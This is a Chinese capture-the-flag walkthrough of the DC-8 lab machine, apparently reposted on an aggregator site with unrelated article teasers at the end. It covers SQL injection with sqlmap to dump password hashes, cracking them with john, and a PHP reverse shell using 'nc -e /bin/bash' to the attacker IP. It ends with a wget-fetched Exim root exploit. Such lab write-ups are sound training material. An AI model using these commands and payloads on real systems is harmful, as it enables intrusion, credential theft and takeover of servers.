DC-8靶机

news2024/11/15 23:50:59

DC-8官网地址

image-20230809171934780

信息收集

靶机MAC: 00:0C:29:3A:46:A1

主机发现

nmap -sP  192.168.80.0/24

image-20230809172134027

端口扫描

nmap -A -p- 192.168.80.142

image-20230809172243707

访问80端口

image-20230809172336591

点击页面能点击的地方,发现每点击一个链接,地址栏的?nid=后面的数字就会变

image-20230809172456660

尝试在数字后面加个 '引号,发现出现sql报错信息,说明存在sql注入漏洞

image-20230809172539702

漏洞利用

sqlmap

列出所有数据库

sqlmap -u "http://192.168.80.142?nid=2" --risk=3 --level=5  --dbs --batch

image-20230809173721854

列出指定数据库的所有表

sqlmap -u "http://192.168.80.142?nid=2" --risk=3  --level=5 --random-agent  -D d7db --tables

image-20230809173844344

列出所有字段

sqlmap -u "http://192.168.80.142?nid=2" --risk=3  --level=5 --random-agent  -D d7db -T users --columns

image-20230809173936157

列出用户名和密码

sqlmap -u "http://192.168.80.142?nid=2" --risk=3  --level=5 --random-agent  -D d7db -T users -C name,pass --dump

image-20230809174018217

将两个密码放到hash.txt,借用john工具来解密

john hash.txt

image-20230809174244527

image-20230809174317253

使用ssh登录,发现没有权限

image-20230809174810350

然后爆破一下目录,找找可以登录的目录

dirsearch -u 192.168.80.142 -i 200

image-20230809174914940

使用admin用户登录,登录失败,那就换一个用户

image-20230809174848608

john用户登录成功

image-20230809175002880

找到可以提交php代码的地方,写入反弹shell

<p>zzzzz</p>
<?php
@exec("nc -e /bin/bash 192.168.80.141 7777");
?> 

kali先开启 监听

image-20230809191032412

image-20230809191054372

往下滑动,保存配置

image-20230809183905865

image-20230809183948074

反弹成功!!

image-20230809191144810

suid提权

find / -user root -perm /4000 2>/dev/null

image-20230809191556479

漏洞搜索

searchsploit exim 4.8

image-20230809193731692

找出绝对路径

 searchsploit -p linux/local/46996.sh 

image-20230809193849194

复制一份保存到桌面

cp /usr/share/exploitdb/exploits/linux/local/46996.sh  46996.sh 

image-20230809194010510

在桌面路径下开启http服务

python -m http.server 8080   

image-20230809192423201

在交互shell里wget下载

wget http://192.168.80.141:8080/46996.sh

image-20230809194153729

chmod 777 39535.sh

image-20230809194251954

查看46996.sh的用法

image-20230809194341594

提权

image-20230809194516772

image-20230809194546076

提权虽然成功,但是它 过一会就自动没有root权限了,所以速度要快,姿势要摔!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/855536.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Leetcode】链表中两数之和(模拟加法器)(击败100%)

step by step. 题目&#xff1a; 给你两个 非空 的链表&#xff0c;表示两个非负的整数。它们每位数字都是按照 逆序 的方式存储的&#xff0c;并且每个节点只能存储 一位 数字。 请你将两个数相加&#xff0c;并以相同形式返回一个表示和的链表。 你可以假设除了数字 0 之外&…

2023年下半年软考初级程序员备考攻略

初级程序员考试科目包含基础知识和应用技术&#xff0c;各科目的考试形式都是笔试&#xff0c;满分均为75分。程序员考试需要各科目在一次考试中均及格才算合格&#xff0c;单科及格的成绩不保留&#xff0c;也不能转移到下次考试时使用。 这里给大家理清一个程序员考试的相关…

iOS开发-JsonModel的学习及使用

IOS JsonModel的学习及使用 当我们从服务端获取到json数据后的时候&#xff0c;我们需要在界面上展示或者保存起来&#xff0c;下面来看下直接通过NSDictionary取出数据的情况。 NSDictionary直接取出数据的诟病。 NSString *name [self.responseObj objectForKey:"nam…

Vue3弹出确认(Popconfirm)

效果如下图&#xff1a;在线预览 APIs 参数说明类型默认值必传title确认框的标题string | slot‘’falsedescription确认框的内容描述string | slot‘’falsecontent展示的文本string | slot‘’falseicon自定义弹出确认框 Icon 图标string | slot‘’falsemaxWidth弹出确认框…

《合成孔径雷达成像算法与实现》Figure3.8

与图3.7的代码区别只在于原始信号的表达式对了一个时间偏移 代码复现如下&#xff1a; clc clear all close all%参数设置 TBP 100; %时间带宽积 T 10e-6; %脉冲持续时间 tc …

SEED-Bench: Benchmarking Multimodal LLMs with Generative Comprehension

本文是LLM相关的文章&#xff0c;针对《SEED-Bench: Benchmarking Multimodal LLMs with Generative Comprehension》的翻译。 SEED-基准&#xff1a;用生成理解对多模式LLM进行基准测试 摘要1 引言2 相关工作3 SEED-Bench 摘要 基于强大的大型语言模型&#xff08;LLM&#…

【SpringBoot框架篇】33.优雅集成i18n实现国际化信息返回

文章目录 1.简介2.MessageSource配置和工具类封装2.1.配置MessageSource相关配置2.2.配置工具类2.3.测试返回国际级文本信息 3.不优雅的web调用示例(看看就行&#xff0c;别用)4.优雅使用示例4.1.错误响应消息枚举类4.2.ThreadLocal工具类配置4.2.1.ThreadLocal工具类数据封装4…

不再限制CPU,这才是Win11完全体的样子嘛

从 Win11 刚问世时&#xff0c;微软就宣称将给其许多 Win10没有也不会支持的新功能。 其中 Android 子系统的支持算得上是最期待&#xff0c;但结果难免有些失望的部分。 先不说使用怎么样&#xff0c;光是安装就困难重重。 绕过限制升级了 Win11 &#xff0c;但没想到安装 W…

idea双击启动无效,idea卡顿问题

idea双击启动无效&#xff1a;大概率是关机时没有正确关闭idea&#xff0c;再次开机导致无法正常启动idea 1.通过任务管理器杀死idea进程后重启idea 2.需要修改配置 打开 &#xff08;以各自电脑实际为准&#xff09;C:\Program Files\JetBrains\IntelliJ IDEA 2020.3.1\bin&am…

LabVIEW使用图像处理检测显微图像中的白血病

LabVIEW使用图像处理检测显微图像中的白血病 人体最重要的部分是血液&#xff0c;因为它使人活着。它执行许多重要功能&#xff0c;例如转移氧气&#xff0c;二氧化碳&#xff0c;矿物质等。血液量不足会极大地影响新陈代谢&#xff0c;如果不及早治疗&#xff0c;这可能是非常…

接口自动化测试框架及接口测试自动化主要知识点

接口自动化测试框架&#xff1a; 接口测试框架&#xff1a;使用最流行的Requests进行接口测试接口请求构造&#xff1a;常见的GET/POST/PUT/HEAD等HTTP请求构造 接口测试断言&#xff1a;状态码、返回内容等断言JSON/XML请求&#xff1a;发送json\xml请求JSON/XML响应断言&…

c语言经典例题讲解(输出菱形,喝汽水问题)

目录 一、输出菱形 二、喝汽水问题 方法1&#xff1a;一步一步来 方法二&#xff1a;直接套公式 一、输出菱形 输出类似于下图的菱形&#xff1a; 通过分析&#xff1a;1、先分为上下两部分输出 2.在输出前先输出空格 3.找规律进行输出 可知&#xff0c;可令上半部分lin…

Python Opencv实践 - 图像属性相关

import numpy as np import cv2 as cv import matplotlib.pyplot as pltimg cv.imread("../SampleImages/pomeranian.png", cv.IMREAD_COLOR) plt.imshow(img[:,:,::-1])#像素操作 pixel img[320,370] print(pixel)#只获取蓝色通道的值 pixel_blue img[320,370,0]…

openwrt dns ssh相关问题

DHCP/DNS中 的技术叫dnsmasq 可配置hosts和 自定义挟持域名配置 image.png image.png 拦截优先级为挟持域名最高&#xff0c;另外需要重启服务方可生效&#xff0c;在系统&#xff0c;启动项中重启dnsmasq ssh 使用root用户SSH登录服务器出现Access Denied错误 只输入root就出现…

Python-OpenCV中的图像处理-图像金字塔

Python-OpenCV中的图像处理-图像金字塔 图像金字塔高斯金字塔拉普拉斯金字塔 金字塔图像融合 图像金字塔 同一图像的不同分辨率的子图集合&#xff0c;如果把最大的图像放在底部&#xff0c;最小的放在顶部&#xff0c;看起来像一座金字塔&#xff0c;故而得名图像金字塔。cv2…

C语言的动态分配空间C++的动态分配空间问题

动态分配空间 C&#xff1a;1、malloc 2、calloc C&#xff1a;new运算符 一 malloc malloc()&#xff1a; 这个函数用于分配一块指定大小的内存块&#xff0c;并返回一个指向该内存块的指针。语法如下&#xff1a; void* malloc(size_t size); 示例&#xff1a; int* ptr …

欧拉操作系统添加磁盘

1、查看磁盘空间 fdisk -l 2、创建新磁盘分区 fdisk /dev/vda 欢迎使用 fdisk (util-linux 2.37.2)。 更改将停留在内存中&#xff0c;直到您决定将更改写入磁盘。 使用写入命令前请三思。 This disk is currently in use - repartitioning is probably a bad idea. Its r…

(力扣)用两个栈实现队列

这里是栈的源代码&#xff1a;栈和队列的实现 当然&#xff0c;自己也可以写一个栈来用&#xff0c;对题目来说不影响&#xff0c;只要符合栈的特点就行。 题目&#xff1a; 请你仅使用两个栈实现先入先出队列。队列应当支持一般队列支持的所有操作&#xff08;push、pop、pe…

c++(空间配置器)[32]

空间配置器 一级空间配置器 || 二级空间配置器 默认先走二级然后判断 二级空间配置器 一个指针指向start_free然后start_free向后移动&#xff0c;相当于哈希桶的头删和头插 8byte&#xff1a;切大补小 C的二级空间配置器按照8字节&#xff08;或者更大的倍数&#xff09;切分…

《流浪地球3》预告片流出?!网友整活竟被郭导翻牌、央视点赞!

年初《流浪地球2》掀起了一股“科幻热”&#xff0c;而这股热潮直至今日还只增不减。这不&#xff0c;一位名叫“数字生命卡兹克”的博主已经开始“整活”了&#xff01;他利用AI技术&#xff0c;自制了《流浪地球3》的预告片&#xff0c;并迅速火遍全网。 更牛的是&#xff0c…